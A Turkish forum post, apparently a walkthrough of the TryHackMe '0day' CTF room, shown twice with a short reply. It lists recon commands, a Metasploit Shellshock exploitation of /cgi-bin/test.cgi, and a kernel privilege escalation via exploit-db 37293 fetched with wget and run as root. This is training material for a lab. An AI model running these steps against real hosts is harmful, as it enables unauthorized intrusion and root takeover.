dostlar bugün size https://tryhackme.com/room/0day için yaptığım türkçe anlatımı yapacağım (link attım ama virustotale gerek yok herhalde zaten resmi bilinen bir ctf sitesi)...

dostlar bugün size https://tryhackme.com/room/0day için yaptığım türkçe anlatımı yapacağım (link attım ama virustotale gerek yok herhalde zaten resmi bilinen bir ctf sitesi)

yorum yapmayı ve beğenmeyi lütfen unutmayınız konuya geçmeden önce :)

size burada kolay yolunu göstereceğim ve çok kolay diyeceksiniz, diğer öğreticiler biraz zor dostlar, kafanızı karıştırabilir :D

USER.TXT:
Keşif
önce nmap taraması yapıyoruz

nmap -sC -sV <host>

— — — — — — — —

daha sonra nikto ile web açık taraması yapıyoruz

nikto -h <host>

shellshock açığı olduğu görülür

__________________

gobuster dir -u http://<host>/cgi-bin -w /usr/share/wordlists/common.txt -x cgi yazarak siteyi tarıyoruz ve test.cgi’yi elde ediyoruz

Remote/Erişim
msfconsole yazarak metasploit framework’ü açıyoruz

daha sonra search shellshock yazarak exploitleri aratıyoruz

exploit/multi/http/apache_mod_cgi_bash_env_exec ‘i seçerek ayarları show options yapıp görüntüledikten sonra rhost, lhost ne varsa kendi hostlarınızı girin. Ardından TARGETURI’yı /cgi-bin/test.cgi girin

ardından exploit yazarak sistemi ele geçirin

shell komutunu kullanıp shell’e bağlanın

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ komutuyla etkileşimli shell’e geçiyoruz

cd /home/ryan dizinine girip user flag’i alabilirsiniz :) (cat user.txt)

ROOT.TXT:
privesc
uname -a yazarak sürümü öğrendik ve exploit-db’den exploit arattık ve 37293 numaralı exploite ulaştık, indirip gcc ile execute ettik

python3 -m http.server yazdık ve wget komutuyla indirttik exploitimizi

daha sonra chmod 777 yetkisini veriyoruz dosyaya

./<exploit-dosyan> yazıp çalıştırıyoruz ve root oluyoruz

cd /root yazıp erişebilirsiniz root flag’ine ve kazandınız, başarılar :)

kaynak: https://stfels.medium.com (kendim yazdım bunu ve kendi makalem)
virustotal: https://www.virustotal.com/gui/url/...db95217531042aa946b83e6be6b0ed468f4?nocache=1

iyi forumlar.
 
dostlar bugün size https://tryhackme.com/room/0day için yaptığım türkçe anlatımı yapacağım (link attım ama virustotale gerek yok herhalde zaten resmi bilinen bir ctf sitesi)

yorum yapmayı ve beğenmeyi lütfen unutmayınız konuya geçmeden önce :)

size burada kolay yolunu göstereceğim ve çok kolay diyeceksiniz, diğer öğreticiler biraz zor dostlar, kafanızı karıştırabilir :D

USER.TXT:
Keşif
önce nmap taraması yapıyoruz

nmap -sC -sV <host>

— — — — — — — —

daha sonra nikto ile web açık taraması yapıyoruz

nikto -h <host>

shellshock açığı olduğu görülür

__________________

gobuster dir -u http://<host>/cgi-bin -w /usr/share/wordlists/common.txt -x cgi yazarak siteyi tarıyoruz ve test.cgi’yi elde ediyoruz

Remote/Erişim
msfconsole yazarak metasploit framework’ü açıyoruz

daha sonra search shellshock yazarak exploitleri aratıyoruz

exploit/multi/http/apache_mod_cgi_bash_env_exec ‘i seçerek ayarları show options yapıp görüntüledikten sonra rhost, lhost ne varsa kendi hostlarınızı girin. Ardından TARGETURI’yı /cgi-bin/test.cgi girin

ardından exploit yazarak sistemi ele geçirin

shell komutunu kullanıp shell’e bağlanın

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ komutuyla etkileşimli shell’e geçiyoruz

cd /home/ryan dizinine girip user flag’i alabilirsiniz :) (cat user.txt)

ROOT.TXT:
privesc
uname -a yazarak sürümü öğrendik ve exploit-db’den exploit arattık ve 37293 numaralı exploite ulaştık, indirip gcc ile execute ettik

python3 -m http.server yazdık ve wget komutuyla indirttik exploitimizi

daha sonra chmod 777 yetkisini veriyoruz dosyaya

./<exploit-dosyan> yazıp çalıştırıyoruz ve root oluyoruz

cd /root yazıp erişebilirsiniz root flag’ine ve kazandınız, başarılar :)

kaynak: https://stfels.medium.com (kendim yazdım bunu ve kendi makalem)
virustotal: https://www.virustotal.com/gui/url/...db95217531042aa946b83e6be6b0ed468f4?nocache=1

iyi forumlar.
eline sağlık. Up Up Up Up
 
131,824Konular
3,271,689Mesajlar
316,301Kullanıcılar
ramaznklcSon Üye
Üst Alt